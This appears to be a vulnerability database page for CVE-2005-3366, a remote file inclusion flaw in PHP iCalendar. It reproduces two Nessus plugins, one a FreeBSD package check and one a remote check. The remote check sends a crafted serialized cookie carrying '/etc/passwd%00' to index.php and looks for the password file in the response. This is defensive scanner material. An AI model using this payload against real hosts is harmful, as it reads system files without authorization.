Vulnerabilities > CVE-2005-3366 - Remote File Include vulnerability in PHP ICalendar Default_View
Attack vector
NETWORK Attack complexity
MEDIUM Privileges required
NONE Confidentiality impact
PARTIAL Integrity impact
PARTIAL Availability impact
PARTIAL Summary
PHP file inclusion vulnerability in index.php in PHP iCalendar 2.0a2 through 2.0.1 allows remote attackers to execute arbitrary PHP code and include arbitrary local files via the phpicalendar cookie. NOTE: this is not a cross-site scripting (XSS) issue as claimed by the original researcher.
Vulnerable Configurations
| Part | Description | Count |
|---|---|---|
| Application | 4 |
Nessus
NASL family FreeBSD Local Security Checks NASL id FREEBSD_PKG_12F9D9E99E1E11DAB410000E0C2E438A.NASL description Francesco Ongaro reports that phpicalendar is vulnerable for a cross site scripting attack. The vulnerability is caused by improper validation of the index.php file allowing attackers to include an arbitrary file with the .php extension last seen 2020-06-01 modified 2020-06-02 plugin id 21389 published 2006-05-13 reporter This script is Copyright (C) 2006-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/21389 title FreeBSD : phpicalendar -- XSS vulnerability (12f9d9e9-9e1e-11da-b410-000e0c2e438a) code #%NASL_MIN_LEVEL 80502 # # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from the FreeBSD VuXML database : # # Copyright 2003-2018 Jacques Vidrine and contributors # # Redistribution and use in source (VuXML) and 'compiled' forms (SGML, # HTML, PDF, PostScript, RTF and so forth) with or without modification, # are permitted provided that the following conditions are met: # 1. Redistributions of source code (VuXML) must retain the above # copyright notice, this list of conditions and the following # disclaimer as the first lines of this file unmodified. # 2. Redistributions in compiled form (transformed to other DTDs, # published online in any format, converted to PDF, PostScript, # RTF and other formats) must reproduce the above copyright # notice, this list of conditions and the following disclaimer # in the documentation and/or other materials provided with the # distribution. # # THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, # THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR # PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS # BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, # OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT # OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR # BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, # WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE # OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION, # EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. # include("compat.inc"); if (description) { script_id(21389); script_version("1.15"); script_cvs_date("Date: 2019/08/02 13:32:38"); script_cve_id("CVE-2005-3366"); script_bugtraq_id(15193); script_name(english:"FreeBSD : phpicalendar -- XSS vulnerability (12f9d9e9-9e1e-11da-b410-000e0c2e438a)"); script_summary(english:"Checks for updated package in pkg_info output"); script_set_attribute( attribute:"synopsis", value:"The remote FreeBSD host is missing a security-related update." ); script_set_attribute( attribute:"description", value: "Francesco Ongaro reports that phpicalendar is vulnerable for a cross site scripting attack. The vulnerability is caused by improper validation of the index.php file allowing attackers to include an arbitrary file with the .php extension" ); # http://www.ush.it/2005/10/25/php-icalendar-css/ script_set_attribute( attribute:"see_also", value:"http://www.nessus.org/u?b03e790a" ); # https://vuxml.freebsd.org/freebsd/12f9d9e9-9e1e-11da-b410-000e0c2e438a.html script_set_attribute( attribute:"see_also", value:"http://www.nessus.org/u?30bcbfbc" ); script_set_attribute(attribute:"solution", value:"Update the affected package."); script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P"); script_set_cvss_temporal_vector("CVSS2#E:H/RL:W/RC:ND"); script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:freebsd:freebsd:phpicalendar"); script_set_attribute(attribute:"cpe", value:"cpe:/o:freebsd:freebsd"); script_set_attribute(attribute:"vuln_publication_date", value:"2005/10/25"); script_set_attribute(attribute:"patch_publication_date", value:"2006/02/15"); script_set_attribute(attribute:"plugin_publication_date", value:"2006/05/13"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2006-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"FreeBSD Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/FreeBSD/release", "Host/FreeBSD/pkg_info"); exit(0); } include("audit.inc"); include("freebsd_package.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); if (!get_kb_item("Host/FreeBSD/release")) audit(AUDIT_OS_NOT, "FreeBSD"); if (!get_kb_item("Host/FreeBSD/pkg_info")) audit(AUDIT_PACKAGE_LIST_MISSING); flag = 0; if (pkg_test(save_report:TRUE, pkg:"phpicalendar<2.1")) flag++; if (flag) { if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get()); else security_warning(0); exit(0); } else audit(AUDIT_HOST_NOT, "affected");NASL family CGI abuses NASL id PHPICALENDAR_FILE_INCLUDE.NASL description The remote host appears to be running PHP iCalendar, a web-based iCal file viewer / parser written in PHP. The version of PHP iCalendar installed on the remote host fails to sanitize the last seen 2020-06-01 modified 2020-06-02 plugin id 20091 published 2005-10-27 reporter This script is Copyright (C) 2005-2018 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/20091 title PHP iCalendar index.php phpicalendar Parameter Remote File Inclusion code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(20091); script_version("1.18"); script_cve_id("CVE-2005-3366"); script_bugtraq_id(15193); script_name(english:"PHP iCalendar index.php phpicalendar Parameter Remote File Inclusion"); script_summary(english:"Checks for remote file inclusion vulnerability in PHP iCalendar"); script_set_attribute(attribute:"synopsis", value: "The remote web server contains a PHP script that is prone to a remote file include vulnerability." ); script_set_attribute(attribute:"description", value: "The remote host appears to be running PHP iCalendar, a web-based iCal file viewer / parser written in PHP. The version of PHP iCalendar installed on the remote host fails to sanitize the 'phpicalendar' cookie before using it in 'index.php' to include PHP code from a separate file. By leveraging this flaw, an unauthenticated attacker may be able to view arbitrary files on the remote host and execute arbitrary PHP code, possibly taken from third-party hosts. Successful exploitation requires that PHP's 'magic_quotes' setting be disabled, that its 'allow_url_fopen' setting be enabled, or that an attacker be able to place PHP files on the remote host." ); script_set_attribute(attribute:"see_also", value:"https://seclists.org/fulldisclosure/2005/Oct/527"); script_set_attribute(attribute:"solution", value: "Upgrade to a version of PHP iCalendar later than 2.0.1 when it becomes available." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P"); script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required"); script_set_attribute(attribute:"exploit_available", value:"false"); script_set_attribute(attribute:"plugin_publication_date", value: "2005/10/27"); script_set_attribute(attribute:"vuln_publication_date", value: "2005/10/25"); script_cvs_date("Date: 2018/11/15 20:50:18"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_set_attribute(attribute:"cpe",value:"cpe:/a:php_icalendar:php_icalendar"); script_end_attributes(); script_category(ACT_ATTACK); script_family(english:"CGI abuses"); script_copyright(english:"This script is Copyright (C) 2005-2018 and is owned by Tenable, Inc. or an Affiliate thereof."); script_dependencies("http_version.nasl"); script_exclude_keys("Settings/disable_cgi_scanning"); script_require_ports("Services/www", 80); script_require_keys("www/PHP"); exit(0); } include("global_settings.inc"); include("misc_func.inc"); include("http.inc"); include("url_func.inc"); include("data_protection.inc"); port = get_http_port(default:80); if (!can_host_php(port:port)) exit(0); # What we use to get (file or partial URL). file = "/etc/passwd%00"; exploit = urlencode( str:string( 'a:1:{', 's:11:"cookie_view";', 's:', strlen(file), ':"', file, '";', '}' ) ); # Loop through directories. if (thorough_tests) dirs = list_uniq("/icalendar", "/phpicalendar", "/calendar", "/ical", "/cal", cgi_dirs()); else dirs = make_list(cgi_dirs()); foreach dir (dirs) { init_cookiejar(); set_http_cookie(name: "phpicalendar", value: exploit); # Try to exploit the flaw. r = http_send_recv3(method: "GET", item:string(dir, "/index.php"), port:port); if (isnull(r)) exit(0); # There's a problem if... if ( # there's an entry for root or... egrep(pattern:"root:.*:0:[01]:", string: r[2]) || # we get an error saying "failed to open stream" or "Failed opening". # # nb: this suggests magic_quotes_gpc was enabled but remote file # includes might still work. egrep(pattern:"Warning.+main\(/etc/passwd.+failed to open stream", string: r[2]) || egrep(pattern:"Failed opening .*'/etc/passwd", string: r[2]) ) { if (report_verbosity > 0) { report = string( r[0],r[1],'\r\n',r[2] ); } else report = NULL; report = data_protection::redact_etc_passwd(output:report); security_warning(port:port, extra:report); exit(0); } }
References
- http://archives.neohapsis.com/archives/fulldisclosure/2005-10/0512.html
- http://marc.info/?l=bugtraq&m=113025930517426&w=2
- http://secunia.com/advisories/17328/
- http://securityreason.com/securityalert/113
- http://securitytracker.com/id?1015102
- http://www.securityfocus.com/bid/15193
- http://www.ush.it/2005/10/25/php-icalendar-css/
- http://www.vupen.com/english/advisories/2005/2204
- https://exchange.xforce.ibmcloud.com/vulnerabilities/22864